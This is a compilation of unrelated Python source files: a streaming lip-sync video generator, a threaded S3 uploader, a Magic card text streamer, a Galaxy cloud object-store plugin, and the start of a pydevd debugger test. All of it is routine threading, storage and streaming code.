mel_idx_multiplier = 15.0 / args.fps
model = load_model(args.checkpoint_path)
print("Model loaded")
frame_h, frame_w = full_frames[0].shape[:-1]
# # initiate video writer
# out = cv2.VideoWriter('temp/result.avi',
# cv2.VideoWriter_fourcc(*'DIVX'), fps, (frame_w, frame_h))
# Setup video streaming pipe:
fifo_video_out = open(fifo_filename_video, "wb")
frames_done = 0
audio_received = 0.0
audio_data = audio_inqueue.get()
while len(audio_data) == NUM_AUDIO_SAMPLES_PER_STEP*args.BYTE_WIDTH:
# break when exactly desired length not received (so very last packet might be lost)
audio_received += NUM_AUDIO_SAMPLES_PER_STEP/args.audio_sr
curr_wav = librosa.util.buf_to_float(audio_data,n_bytes=args.BYTE_WIDTH) # convert to float
# print(curr_wav.shape)
# print('start:',audio_step*NUM_AUDIO_SAMPLES_PER_STEP)
# print('end:',(audio_step+1)*NUM_AUDIO_SAMPLES_PER_STEP)
mel = audio.melspectrogram(curr_wav)
# print(curr_wav)
# print(mel.shape)
if np.isnan(mel.reshape(-1)).sum() > 0:
raise ValueError(
'Mel contains nan! Using a TTS voice? Add a small epsilon noise to the wav file and try again')
# mel_chunk generation process. Generate overlapping chunks, with the shift in
# chunks determined by int(i * mel_idx_multiplier), and the chunk length is
# mel_step_size = 16 (except for last chunk). Two important constraints to satisfy:
# 1. len(mel_chunks) should be equal to number of frames to be generated according to
# fps and NUM_AUDIO_SAMPLES_PER_STEP
# 2. Each mel_chunk must be sufficiently long otherwise NN gives error.
mel_chunks = []
i = 0
while 1:
start_idx = int(i * mel_idx_multiplier)
if start_idx + mel_step_size > len(mel[0]):
mel_chunks.append(mel[:, len(mel[0]) - mel_step_size:])
break
mel_chunks.append(mel[:, start_idx: start_idx + mel_step_size])
i += 1
# print("Length of mel chunks: {}".format(len(mel_chunks)))
batch_size = args.wav2lip_batch_size
gen = datagen(full_frames, face_det_results, mel_chunks, frames_done)
for i, (img_batch, mel_batch, frames, coords) in enumerate(gen):
img_batch = torch.FloatTensor(np.transpose(img_batch, (0, 3, 1, 2))).to(device)
mel_batch = torch.FloatTensor(np.transpose(mel_batch, (0, 3, 1, 2))).to(device)
with torch.no_grad():
pred = model(mel_batch, img_batch)
pred = pred.cpu().numpy().transpose(0, 2, 3, 1) * 255.
for p, f, c in zip(pred, frames, coords):
y1, y2, x1, x2 = c
p = cv2.resize(p.astype(np.uint8), (x2 - x1, y2 - y1))
f[y1:y2, x1:x2] = p
# print(f.dtype)
# cv2.imshow("mywindow",f)
# cv2.waitKey(1)
# write generated frame to video writer (note: no audio right now)
# out.write(f)
out_frame_BGR = f.copy()
out_frame_RGB = out_frame_BGR[:,:,[2,1,0]]
frames_done += 1
# write to pipe
ffmpeg_stream.write_video_frame(fifo_video_out, out_frame_RGB)
print('Generated',frames_done,'frames from','{:.1f}'.format(audio_received),'s of received audio', end='\r')
audio_data = audio_inqueue.get()
print()
fifo_video_out.close()
# out.release()
# # combine original audio and generated video
# command = 'ffmpeg -y -i {} -i {} -strict -2 -q:v 1 {}'.format(args.audio, 'temp/result.avi', args.outfile)
# subprocess.call(command, shell=platform.system() != 'Windows')
def stream():
width, height = ffmpeg_stream.get_video_info(args.face)
# fifo pipes (remove file name if already exists)
fifo_filename_video = '/tmp/fifovideo'
fifo_filename_audio = '/tmp/fifoaudio'
if os.path.exists(fifo_filename_video):
os.remove(fifo_filename_video)
if os.path.exists(fifo_filename_audio):
os.remove(fifo_filename_audio)
os.mkfifo(fifo_filename_video)
os.mkfifo(fifo_filename_audio)
logger.info('fifo exists now')
process2 = ffmpeg_stream.start_ffmpeg_process2(fifo_filename_video, fifo_filename_audio, width, height, args.fps, args.port)
logger.info('Output pipe set')
######## OLD CODE: NOW REPLACED BY SIMPLER QUEUE BASED SYSTEM
# # set up pipes to transfer audio received from audio socket connection in audio_input_thread_handler
# # to audio_thread_handler and video_thread_handler
# audio_inpipe_audio_thread, audio_outpipe_audio_thread = os.pipe()
# audio_inpipe_video_thread, audio_outpipe_video_thread = os.pipe()
# # The old code led to deadlock
# # ffmpeg was still reading the initial audio and hence the video writer to ffmpeg was blocked.
# # Since the video thread was blocked on the write_video_frame, it wasn’t reading the next audio frame
# # Since the video thread wasn’t reading the next audio frame, the thread receiving audio from network and writing the audio to both audio & video handlers was blocked.
# # So the audio handler was not receiving any new audio from the thread receiving audio from network
# # Thus ffmpeg was stuck trying to get more audio from audio handler
# # The underlying reason is that the pipes have limited capacity and so the writer (specifically in third point) was blocked.
# # When I increased the capacity of the pipe to 1 MB using code from https://programtalk.com/python-examples/fcntl.F_SETPIPE_SZ/, it starts working correctly.
# fcntl.F_SETPIPE_SZ = 1031
# fcntl.fcntl(audio_outpipe_audio_thread, fcntl.F_SETPIPE_SZ, 1000000)
# fcntl.fcntl(audio_outpipe_video_thread, fcntl.F_SETPIPE_SZ, 1000000)
######## OLD CODE END
# queues for sending audio packets from T1 to T2 and T3
# unlimited capacity
audio_packet_queue_T2 = queue.Queue()
audio_packet_queue_T3 = queue.Queue()
# queue for sending generated audio from T4 to T1
# unlimited capacity
audio_packet_queue_T4 = queue.Queue()
# we run audio and video in separate threads otherwise the fifo opening blocks
outqueue_list = [audio_packet_queue_T2, audio_packet_queue_T3]
start_audio_input_thread = threading.Event() # set in T4 to start T1 execution
kill_audio_input_thread = threading.Event() # set in T4 to stop T1 execution
# create threads
audio_input_thread = threading.Thread(target=audio_input_thread_handler, \
args=(audio_packet_queue_T4,outqueue_list,start_audio_input_thread,kill_audio_input_thread))
logger.info('T1: Audio input thread launched')
video_thread = threading.Thread(target=txt2vid_inference,args=(fifo_filename_video, \
audio_packet_queue_T2, width, height))
logger.info('T2: Video thread launched')
audio_thread = threading.Thread(target=audio_thread_handler,args=(fifo_filename_audio, \
audio_packet_queue_T3))
logger.info('T3: Audio thread launched')
text_thread = threading.Thread(target=text_input_thread_handler,args=(audio_packet_queue_T4,start_audio_input_thread,kill_audio_input_thread))
logger.info('T4: Text input thread launched')
# start threads
audio_input_thread.start()
video_thread.start()
audio_thread.start()
text_thread.start()
# wait for threads to finish executing
audio_input_thread.join()
video_thread.join()
audio_thread.join()
text_thread.join()
logger.info('Waiting for ffmpeg process2')
process2.wait()
os.remove(fifo_filename_video)
os.remove(fifo_filename_audio)
logger.info('Done')
def main():
stream()
if __name__ == '__main__':
main()
|
write_to_s3.py
|
import time
import os
import progressbar
import threading
from glob import glob
from boto.s3.connection import S3Connection
progress = progressbar.ProgressBar(widgets=[progressbar.Bar('*', '[', ']'), progressbar.Percentage(), ' '])
def files_to_s3(files, bucket_name):
'''
INPUT (1) list 'files': all files to upload to s3 bucket
(2) string 'bucket_name': name of bucket to dump into
writes all files to s3 bucket using threads
'''
AWS_KEY = os.environ['AWS_ACCESS_KEY_ID']
AWS_SECRET = os.environ['AWS_SECRET_ACCESS_KEY']
def upload(myfile):
conn = S3Connection(aws_access_key_id = AWS_KEY, aws_secret_access_key = AWS_SECRET)
bucket = conn.get_bucket(bucket_name)
key = bucket.new_key(myfile).set_contents_from_filename(myfile) # , cb=percent_cb, num_cb=1)
return myfile
for fname in files:
t = threading.Thread(target=upload, args=(fname,)).start()
if __name__ == '__main__':
files = glob('n4_PNG/**')
progress.currval = 0
start_time = time.time()
for x in progress(xrange(len(files) / 100)): #avoid threading complications
time.sleep(2)
f = files[100 * x : (100 * x) + 100]
files_to_s3(f, 'n4itk-slices')
# print(str(x) + ' out of ' + str(len(files)/100))
print('------%s seconds------' % (time.time() - start_time))
|
streamcards.py
|
#!/usr/bin/env python
# -- STOLEN FROM torch-rnn/scripts/streamfile.py -- #
import os
import threading
import time
import signal
import traceback
import psutil
# correctly setting up a stream that won't get orphaned and left clutting the operating
# system proceeds in 3 parts:
# 1) invoke install_suicide_handlers() to ensure correct behavior on interrupt
# 2) get threads by invoking spawn_stream_threads
# 3) invoke wait_and_kill_self_noreturn(threads)
# or, use the handy wrapper that does it for you
def spawn_stream_threads(fds, runthread, mkargs):
threads = []
for i, fd in enumerate(fds):
stream_thread = threading.Thread(target=runthread, args=mkargs(i, fd))
stream_thread.daemon = True
stream_thread.start()
threads.append(stream_thread)
return threads
def force_kill_self_noreturn():
# We have a strange issue here, which is that our threads will refuse to die
# to a normal exit() or sys.exit() because they're all blocked in write() calls
# on full pipes; the simplest workaround seems to be to ask the OS to terminate us.
# This kinda works, but...
#os.kill(os.getpid(), signal.SIGTERM)
# psutil might have useful features like checking if the pid has been reused before killing it.
# Also we might have child processes like l2e luajits to think about.
me = psutil.Process(os.getpid())
for child in me.children(recursive=True):
child.terminate()
me.terminate()
def handler_kill_self(signum, frame):
if signum != signal.SIGQUIT:
traceback.print_stack(frame)
print('caught signal {:d} - streamer sending SIGTERM to self'.format(signum))
force_kill_self_noreturn()
def install_suicide_handlers():
for sig in [signal.SIGHUP, signal.SIGINT, signal.SIGQUIT]:
signal.signal(sig, handler_kill_self)
def wait_and_kill_self_noreturn(threads):
running = True
while running:
running = False
for thread in threads:
if thread.is_alive():
running = True
if(os.getppid() <= 1):
# exit if parent process died (and we were reparented to init)
break
time.sleep(1)
force_kill_self_noreturn()
def streaming_noreturn(fds, write_stream, mkargs):
install_suicide_handlers()
threads = spawn_stream_threads(fds, write_stream, mkargs)
wait_and_kill_self_noreturn(threads)
assert False, 'should not return from streaming'
# -- END STOLEN FROM torch-rnn/scripts/streamfile.py -- #
import sys
import random
libdir = os.path.join(os.path.dirname(os.path.realpath(__file__)), '../lib')
sys.path.append(libdir)
import utils
import jdecode
import transforms
def main(args):
fds = args.fds
fname = args.fname
block_size = args.block_size
main_seed = args.seed if args.seed != 0 else None
# simple default encoding for now, will add more options with the curriculum
# learning feature
cards = jdecode.mtg_open_file(fname, verbose=True, linetrans=True)
def write_stream(i, fd):
local_random = random.Random(main_seed)
local_random.jumpahead(i)
local_cards = [card for card in cards]
with open('/proc/self/fd/'+str(fd), 'wt') as f:
while True:
local_random.shuffle(local_cards)
for card in local_cards:
f.write(card.encode(randomize_mana=True, randomize_lines=True))
f.write(utils.cardsep)
def mkargs(i, fd):
return i, fd
streaming_noreturn(fds, write_stream, mkargs)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('fds', type=int, nargs='+',
help='file descriptors to write streams to')
parser.add_argument('-f', '--fname', default=os.path.join(libdir, '../data/output.txt'),
help='file to read cards from')
parser.add_argument('-n', '--block_size', type=int, default=10000,
help='number of characters each stream should read/write at a time')
parser.add_argument('-s', '--seed', type=int, default=0,
help='random seed')
args = parser.parse_args()
main(args)
|
cloud.py
|
"""
Object Store plugin for Cloud storage.
"""
import logging
import multiprocessing
import os
import shutil
import subprocess
import threading
import time
from datetime import datetime
from galaxy.exceptions import ObjectInvalid, ObjectNotFound
from galaxy.util import (
directory_hash_id,
safe_relpath,
umask_fix_perms,
)
from galaxy.util.sleeper import Sleeper
from .s3 import CloudConfigMixin, parse_config_xml
from ..objectstore import convert_bytes, ObjectStore
try:
from cloudbridge.cloud.factory import CloudProviderFactory, ProviderList
from cloudbridge.cloud.interfaces.exceptions import InvalidNameException
except ImportError:
CloudProviderFactory = None
ProviderList = None
log = logging.getLogger(__name__)
NO_CLOUDBRIDGE_ERROR_MESSAGE = (
"Cloud ObjectStore is configured, but no CloudBridge dependency available."
"Please install CloudBridge or modify ObjectStore configuration."
)
class Cloud(ObjectStore, CloudConfigMixin):
"""
Object store that stores objects as items in an cloud storage. A local
cache exists that is used as an intermediate location for files between
Galaxy and the cloud storage.
"""
store_type = 'cloud'
def __init__(self, config, config_dict):
super(Cloud, self).__init__(config, config_dict)
self.transfer_progress = 0
auth_dict = config_dict['auth']
bucket_dict = config_dict['bucket']
connection_dict = config_dict.get('connection', {})
cache_dict = config_dict['cache']
self.access_key = auth_dict.get('access_key')
self.secret_key = auth_dict.get('secret_key')
self.bucket = bucket_dict.get('name')
self.use_rr = bucket_dict.get('use_reduced_redundancy', False)
self.max_chunk_size = bucket_dict.get('max_chunk_size', 250)
self.host = connection_dict.get('host', None)
self.port = connection_dict.get('port', 6000)
self.multipart = connection_dict.get('multipart', True)
self.is_secure = connection_dict.get('is_secure', True)
self.conn_path = connection_dict.get('conn_path', '/')
self.cache_size = cache_dict.get('size', -1)
self.staging_path = cache_dict.get('path') or self.config.object_store_cache_path
self._initialize()
def _initialize(self):
if CloudProviderFactory is None:
raise Exception(NO_CLOUDBRIDGE_ERROR_MESSAGE)
self._configure_connection()
self.bucket = self._get_bucket(self.bucket)
# Clean cache only if value is set in galaxy.ini
if self.cache_size != -1:
# Convert GBs to bytes for comparison
self.cache_size = self.cache_size * 1073741824
# Helper for interruptable sleep
self.sleeper = Sleeper()
self.cache_monitor_thread = threading.Thread(target=self.__cache_monitor)
self.cache_monitor_thread.start()
log.info("Cache cleaner manager started")
# Test if 'axel' is available for parallel download and pull the key into cache
try:
subprocess.call('axel')
self.use_axel = True
except OSError:
self.use_axel = False
def _configure_connection(self):
log.debug("Configuring AWS-S3 Connection")
aws_config = {'aws_access_key': self.access_key,
'aws_secret_key': self.secret_key}
self.conn = CloudProviderFactory().create_provider(ProviderList.AWS, aws_config)
@classmethod
def parse_xml(clazz, config_xml):
return parse_config_xml(config_xml)
def to_dict(self):
as_dict = super(Cloud, self).to_dict()
as_dict.update(self._config_to_dict())
return as_dict
def __cache_monitor(self):
time.sleep(2) # Wait for things to load before starting the monitor
while self.running:
total_size = 0
# Is this going to be too expensive of an operation to be done frequently?
file_list = []
for dirpath, _, filenames in os.walk(self.staging_path):
for filename in filenames:
filepath = os.path.join(dirpath, filename)
file_size = os.path.getsize(filepath)
total_size += file_size
# Get the time given file was last accessed
last_access_time = time.localtime(os.stat(filepath)[7])
# Compose a tuple of the access time and the file path
file_tuple = last_access_time, filepath, file_size
file_list.append(file_tuple)
# Sort the file list (based on access time)
file_list.sort()
# Initiate cleaning once within 10% of the defined cache size?
cache_limit = self.cache_size * 0.9
if total_size > cache_limit:
log.info("Initiating cache cleaning: current cache size: %s; clean until smaller than: %s",
convert_bytes(total_size), convert_bytes(cache_limit))
# How much to delete? If simply deleting up to the cache-10% limit,
# is likely to be deleting frequently and may run the risk of hitting
# the limit - maybe delete additional #%?
# For now, delete enough to leave at least 10% of the total cache free
delete_this_much = total_size - cache_limit
self.__clean_cache(file_list, delete_this_much)
self.sleeper.sleep(30) # Test cache size every 30 seconds?
def __clean_cache(self, file_list, delete_this_much):
""" Keep deleting files from the file_list until the size of the deleted
files is greater than the value in delete_this_much parameter.
:type file_list: list
:param file_list: List of candidate files that can be deleted. This method
will start deleting files from the beginning of the list so the list
should be sorted accordingly. The list must contains 3-element tuples,
positioned as follows: position 0 holds file last accessed timestamp
(as time.struct_time), position 1 holds file path, and position 2 has
file size (e.g., (<access time>, /mnt/data/dataset_1.dat), 472394)
:type delete_this_much: int
:param delete_this_much: Total size of files, in bytes, that should be deleted.
"""
# Keep deleting datasets from file_list until deleted_amount does not
# exceed delete_this_much; start deleting from the front of the file list,
# which assumes the oldest files come first on the list.
deleted_amount = 0
for entry in enumerate(file_list):
if deleted_amount < delete_this_much:
deleted_amount += entry[2]
os.remove(entry[1])
# Debugging code for printing deleted files' stats
# folder, file_name = os.path.split(f[1])
# file_date = time.strftime("%m/%d/%y %H:%M:%S", f[0])
# log.debug("%s. %-25s %s, size %s (deleted %s/%s)" \
# % (i, file_name, convert_bytes(f[2]), file_date, \
# convert_bytes(deleted_amount), convert_bytes(delete_this_much)))
else:
log.debug("Cache cleaning done. Total space freed: %s", convert_bytes(deleted_amount))
return
def _get_bucket(self, bucket_name):
try:
bucket = self.conn.storage.buckets.get(bucket_name)
if bucket is None:
log.debug("Bucket not found, creating a bucket with handle '%s'", bucket_name)
bucket = self.conn.storage.buckets.create(bucket_name)
log.debug("Using cloud ObjectStore with bucket '%s'", bucket.name)
return bucket
except InvalidNameException:
log.exception("Invalid bucket name -- unable to continue")
raise
except Exception:
# These two generic exceptions will be replaced by specific exceptions
# once proper exceptions are exposed by CloudBridge.
log.exception("Could not get bucket '{}'".format(bucket_name))
raise Exception
def _fix_permissions(self, rel_path):
""" Set permissions on rel_path"""
for basedir, _, files in os.walk(rel_path):
umask_fix_perms(basedir, self.config.umask, 0o777, self.config.gid)
for filename in files:
path = os.path.join(basedir, filename)
# Ignore symlinks
if os.path.islink(path):
continue
umask_fix_perms(path, self.config.umask, 0o666, self.config.gid)
def _construct_path(self, obj, base_dir=None, dir_only=None, extra_dir=None, extra_dir_at_root=False, alt_name=None,
obj_dir=False, **kwargs):
# extra_dir should never be constructed from provided data but just
# make sure there are no shenannigans afoot
if extra_dir and extra_dir != os.path.normpath(extra_dir):
log.warning('extra_dir is not normalized: %s', extra_dir)
raise ObjectInvalid("The requested object is invalid")
# ensure that any parent directory references in alt_name would not
# result in a path not contained in the directory path constructed here
if alt_name:
if not safe_relpath(alt_name):
log.warning('alt_name would locate path outside dir: %s', alt_name)
raise ObjectInvalid("The requested object is invalid")
# alt_name can contain parent directory references, but S3 will not
# follow them, so if they are valid we normalize them out
alt_name = os.path.normpath(alt_name)
rel_path = os.path.join(*directory_hash_id(obj.id))
if extra_dir is not None:
if extra_dir_at_root:
rel_path = os.path.join(extra_dir, rel_path)
else:
rel_path = os.path.join(rel_path, extra_dir)
# for JOB_WORK directory
if obj_dir:
rel_path = os.path.join(rel_path, str(obj.id))
if base_dir:
base = self.extra_dirs.get(base_dir)
return os.path.join(base, rel_path)
# S3 folders are marked by having trailing '/' so add it now
rel_path = '%s/' % rel_path
if not dir_only:
rel_path = os.path.join(rel_path, alt_name if alt_name else "dataset_%s.dat" % obj.id)
return rel_path
def _get_cache_path(self, rel_path):
return os.path.abspath(os.path.join(self.staging_path, rel_path))
def _get_transfer_progress(self):
return self.transfer_progress
def _get_size_in_cloud(self, rel_path):
try:
obj = self.bucket.objects.get(rel_path)
if obj:
return obj.size
except Exception:
log.exception("Could not get size of key '%s' from S3", rel_path)
return -1
def _key_exists(self, rel_path):
exists = False
try:
# A hackish way of testing if the rel_path is a folder vs a file
is_dir = rel_path[-1] == '/'
if is_dir:
keyresult = self.bucket.objects.list(prefix=rel_path)
if len(keyresult) > 0:
exists = True
else:
exists = False
else:
exists = True if self.bucket.objects.get(rel_path) is not None else False
except Exception:
log.exception("Trouble checking existence of S3 key '%s'", rel_path)
return False
if rel_path[0] == '/':
raise
return exists
def _in_cache(self, rel_path):
""" Check if the given dataset is in the local cache and return True if so. """
# log.debug("------ Checking cache for rel_path %s" % rel_path)
cache_path = self._get_cache_path(rel_path)
return os.path.exists(cache_path)
def _pull_into_cache(self, rel_path):
# Ensure the cache directory structure exists (e.g., dataset_#_files/)
rel_path_dir = os.path.dirname(rel_path)
if not os.path.exists(self._get_cache_path(rel_path_dir)):
os.makedirs(self._get_cache_path(rel_path_dir))
# Now pull in the file
file_ok = self._download(rel_path)
self._fix_permissions(self._get_cache_path(rel_path_dir))
return file_ok
def _transfer_cb(self, complete, total):
self.transfer_progress += 10
def _download(self, rel_path):
try:
log.debug("Pulling key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
key = self.bucket.objects.get(rel_path)
# Test if cache is large enough to hold the new file
if self.cache_size > 0 and key.size > self.cache_size:
log.critical("File %s is larger (%s) than the cache size (%s). Cannot download.",
rel_path, key.size, self.cache_size)
return False
if self.use_axel:
log.debug("Parallel pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
ncores = multiprocessing.cpu_count()
url = key.generate_url(7200)
ret_code = subprocess.call("axel -a -n %s '%s'" % (ncores, url))
if ret_code == 0:
return True
else:
log.debug("Pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
self.transfer_progress = 0 # Reset transfer progress counter
with open(self._get_cache_path(rel_path), "w+") as downloaded_file_handle:
key.save_content(downloaded_file_handle)
return True
except Exception:
log.exception("Problem downloading key '%s' from S3 bucket '%s'", rel_path, self.bucket.name)
return False
def _push_to_os(self, rel_path, source_file=None, from_string=None):
"""
Push the file pointed to by ``rel_path`` to the object store naming the key
``rel_path``. If ``source_file`` is provided, push that file instead while
still using ``rel_path`` as the key name.
If ``from_string`` is provided, set contents of the file to the value of
the string.
"""
try:
source_file = source_file if source_file else self._get_cache_path(rel_path)
if os.path.exists(source_file):
if os.path.getsize(source_file) == 0 and (self.bucket.objects.get(rel_path) is not None):
log.debug("Wanted to push file '%s' to S3 key '%s' but its size is 0; skipping.", source_file,
rel_path)
return True
if from_string:
if not self.bucket.objects.get(rel_path):
created_obj = self.bucket.objects.create(rel_path)
created_obj.upload(source_file)
else:
self.bucket.objects.get(rel_path).upload(source_file)
log.debug("Pushed data from string '%s' to key '%s'", from_string, rel_path)
else:
start_time = datetime.now()
log.debug("Pushing cache file '%s' of size %s bytes to key '%s'", source_file,
os.path.getsize(source_file), rel_path)
self.transfer_progress = 0 # Reset transfer progress counter
if not self.bucket.objects.get(rel_path):
created_obj = self.bucket.objects.create(rel_path)
created_obj.upload_from_file(source_file)
else:
self.bucket.objects.get(rel_path).upload_from_file(source_file)
end_time = datetime.now()
log.debug("Pushed cache file '%s' to key '%s' (%s bytes transfered in %s sec)",
source_file, rel_path, os.path.getsize(source_file), end_time - start_time)
return True
else:
log.error("Tried updating key '%s' from source file '%s', but source file does not exist.",
rel_path, source_file)
except Exception:
log.exception("Trouble pushing S3 key '%s' from file '%s'", rel_path, source_file)
return False
def file_ready(self, obj, **kwargs):
"""
A helper method that checks if a file corresponding to a dataset is
ready and available to be used. Return ``True`` if so, ``False`` otherwise.
"""
rel_path = self._construct_path(obj, **kwargs)
# Make sure the size in cache is available in its entirety
if self._in_cache(rel_path):
if os.path.getsize(self._get_cache_path(rel_path)) == self._get_size_in_cloud(rel_path):
return True
log.debug("Waiting for dataset %s to transfer from OS: %s/%s", rel_path,
os.path.getsize(self._get_cache_path(rel_path)), self._get_size_in_cloud(rel_path))
return False
def exists(self, obj, **kwargs):
in_cache = False
rel_path = self._construct_path(obj, **kwargs)
# Check cache
if self._in_cache(rel_path):
in_cache = True
# Check cloud
in_cloud = self._key_exists(rel_path)
# log.debug("~~~~~~ File '%s' exists in cache: %s; in s3: %s" % (rel_path, in_cache, in_s3))
# dir_only does not get synced so shortcut the decision
dir_only = kwargs.get('dir_only', False)
base_dir = kwargs.get('base_dir', None)
if dir_only:
if in_cache or in_cloud:
return True
# for JOB_WORK directory
elif base_dir:
if not os.path.exists(rel_path):
os.makedirs(rel_path)
return True
else:
return False
# TODO: Sync should probably not be done here. Add this to an async upload stack?
if in_cache and not in_cloud:
self._push_to_os(rel_path, source_file=self._get_cache_path(rel_path))
return True
elif in_cloud:
return True
else:
return False
def create(self, obj, **kwargs):
if not self.exists(obj, **kwargs):
# Pull out locally used fields
extra_dir = kwargs.get('extra_dir', None)
extra_dir_at_root = kwargs.get('extra_dir_at_root', False)
dir_only = kwargs.get('dir_only', False)
alt_name = kwargs.get('alt_name', None)
# Construct hashed path
rel_path = os.path.join(*directory_hash_id(obj.id))
# Optionally append extra_dir
if extra_dir is not None:
if extra_dir_at_root:
rel_path = os.path.join(extra_dir, rel_path)
else:
rel_path = os.path.join(rel_path, extra_dir)
# Create given directory in cache
cache_dir = os.path.join(self.staging_path, rel_path)
if not os.path.exists(cache_dir):
os.makedirs(cache_dir)
if not dir_only:
rel_path = os.path.join(rel_path, alt_name if alt_name else "dataset_%s.dat" % obj.id)
open(os.path.join(self.staging_path, rel_path), 'w').close()
self._push_to_os(rel_path, from_string='')
def empty(self, obj, **kwargs):
if self.exists(obj, **kwargs):
return bool(self.size(obj, **kwargs) > 0)
else:
raise ObjectNotFound('objectstore.empty, object does not exist: %s, kwargs: %s'
% (str(obj), str(kwargs)))
def size(self, obj, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
if self._in_cache(rel_path):
try:
return os.path.getsize(self._get_cache_path(rel_path))
except OSError as ex:
log.info("Could not get size of file '%s' in local cache, will try cloud. Error: %s", rel_path, ex)
elif self.exists(obj, **kwargs):
return self._get_size_in_cloud(rel_path)
log.warning("Did not find dataset '%s', returning 0 for size", rel_path)
return 0
def delete(self, obj, entire_dir=False, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
extra_dir = kwargs.get('extra_dir', None)
base_dir = kwargs.get('base_dir', None)
dir_only = kwargs.get('dir_only', False)
obj_dir = kwargs.get('obj_dir', False)
try:
# Remove temparory data in JOB_WORK directory
if base_dir and dir_only and obj_dir:
shutil.rmtree(os.path.abspath(rel_path))
return True
# For the case of extra_files, because we don't have a reference to
# individual files/keys we need to remove the entire directory structure
# with all the files in it. This is easy for the local file system,
# but requires iterating through each individual key in S3 and deleing it.
if entire_dir and extra_dir:
shutil.rmtree(self._get_cache_path(rel_path))
results = self.bucket.objects.list(prefix=rel_path)
for key in results:
log.debug("Deleting key %s", key.name)
key.delete()
return True
else:
# Delete from cache first
os.unlink(self._get_cache_path(rel_path))
# Delete from S3 as well
if self._key_exists(rel_path):
key = self.bucket.objects.get(rel_path)
log.debug("Deleting key %s", key.name)
key.delete()
return True
except Exception:
log.exception("Could not delete key '%s' from cloud", rel_path)
except OSError:
log.exception('%s delete error', self.get_filename(obj, **kwargs))
return False
def get_data(self, obj, start=0, count=-1, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
# Check cache first and get file if not there
if not self._in_cache(rel_path):
self._pull_into_cache(rel_path)
# Read the file content from cache
data_file = open(self._get_cache_path(rel_path), 'r')
data_file.seek(start)
content = data_file.read(count)
data_file.close()
return content
def get_filename(self, obj, **kwargs):
base_dir = kwargs.get('base_dir', None)
dir_only = kwargs.get('dir_only', False)
obj_dir = kwargs.get('obj_dir', False)
rel_path = self._construct_path(obj, **kwargs)
# for JOB_WORK directory
if base_dir and dir_only and obj_dir:
return os.path.abspath(rel_path)
cache_path = self._get_cache_path(rel_path)
# S3 does not recognize directories as files so cannot check if those exist.
# So, if checking dir only, ensure given dir exists in cache and return
# the expected cache path.
# dir_only = kwargs.get('dir_only', False)
# if dir_only:
# if not os.path.exists(cache_path):
# os.makedirs(cache_path)
# return cache_path
# Check if the file exists in the cache first
if self._in_cache(rel_path):
return cache_path
# Check if the file exists in persistent storage and, if it does, pull it into cache
elif self.exists(obj, **kwargs):
if dir_only: # Directories do not get pulled into cache
return cache_path
else:
if self._pull_into_cache(rel_path):
return cache_path
# For the case of retrieving a directory only, return the expected path
# even if it does not exist.
# if dir_only:
# return cache_path
raise ObjectNotFound('objectstore.get_filename, no cache_path: %s, kwargs: %s'
% (str(obj), str(kwargs)))
# return cache_path # Until the upload tool does not explicitly create the dataset, return expected path
def update_from_file(self, obj, file_name=None, create=False, **kwargs):
if create:
self.create(obj, **kwargs)
if self.exists(obj, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
# Chose whether to use the dataset file itself or an alternate file
if file_name:
source_file = os.path.abspath(file_name)
# Copy into cache
cache_file = self._get_cache_path(rel_path)
try:
if source_file != cache_file:
# FIXME? Should this be a `move`?
shutil.copy2(source_file, cache_file)
self._fix_permissions(cache_file)
except OSError:
log.exception("Trouble copying source file '%s' to cache '%s'", source_file, cache_file)
else:
source_file = self._get_cache_path(rel_path)
# Update the file on cloud
self._push_to_os(rel_path, source_file)
else:
raise ObjectNotFound('objectstore.update_from_file, object does not exist: %s, kwargs: %s'
% (str(obj), str(kwargs)))
def get_object_url(self, obj, **kwargs):
if self.exists(obj, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
try:
key = self.bucket.objects.get(rel_path)
return key.generate_url(expires_in=86400) # 24hrs
except Exception:
log.exception("Trouble generating URL for dataset '%s'", rel_path)
return None
def get_store_usage_percent(self):
return 0.0
|
test_debugger.py
|
# coding: utf-8
'''
The idea is that we record the commands sent to the debugger and reproduce them from this script
(so, this works as the client, which spawns the debugger as a separate process and communicates
to it as if it was run from the outside)
Note that it's a python script but it'll spawn a process to run as jython, ironpython and as python.
'''
import time
import pytest
from tests_python import debugger_unittest
from tests_python.debugger_unittest import (CMD_SET_PROPERTY_TRACE, REASON_CAUGHT_EXCEPTION,
REASON_UNCAUGHT_EXCEPTION, REASON_STOP_ON_BREAKPOINT, REASON_THREAD_SUSPEND, overrides, CMD_THREAD_CREATE,
CMD_GET_THREAD_STACK, REASON_STEP_INTO_MY_CODE, CMD_GET_EXCEPTION_DETAILS, IS_IRONPYTHON, IS_JYTHON, IS_CPYTHON,
IS_APPVEYOR, wait_for_condition, CMD_GET_FRAME, CMD_GET_BREAKPOINT_EXCEPTION,
CMD_THREAD_SUSPEND, CMD_STEP_OVER, REASON_STEP_OVER, CMD_THREAD_SUSPEND_SINGLE_NOTIFICATION,
CMD_THREAD_RESUME_SINGLE_NOTIFICATION, REASON_STEP_RETURN, REASON_STEP_RETURN_MY_CODE,
REASON_STEP_OVER_MY_CODE, REASON_STEP_INTO, CMD_THREAD_KILL, IS_PYPY, REASON_STOP_ON_START)
from _pydevd_bundle.pydevd_constants import IS_WINDOWS, IS_PY38_OR_GREATER, IS_PY39_OR_GREATER
from _pydevd_bundle.pydevd_comm_constants import CMD_RELOAD_CODE
import json
import pydevd_file_utils
import subprocess
import threading
from tests_python.debug_constants import IS_PY26
from _pydev_bundle import pydev_log
try:
from urllib import unquote
except ImportError:
from urllib.parse import unquote
from tests_python.debug_constants import * # noqa
pytest_plugins = [
str('tests_python.debugger_fixtures'),
]
try:
xrange
except:
xrange = range
if IS_PY2:
builtin_qualifier = "__builtin__"
else:
builtin_qualifier = "builtins"
@pytest.mark.skipif(not IS_CPYTHON, reason='Test needs gc.get_referrers/reference counting to really check anything.')
def test_case_referrers(case_setup):
with case_setup.test_file('_debugger_case1.py') as writer:
writer.log.append('writing add breakpoint')
writer.write_add_breakpoint(6, 'set_up')
writer.log.append('making initial run')
writer.write_make_initial_run()
writer.log.append('waiting for breakpoint hit')
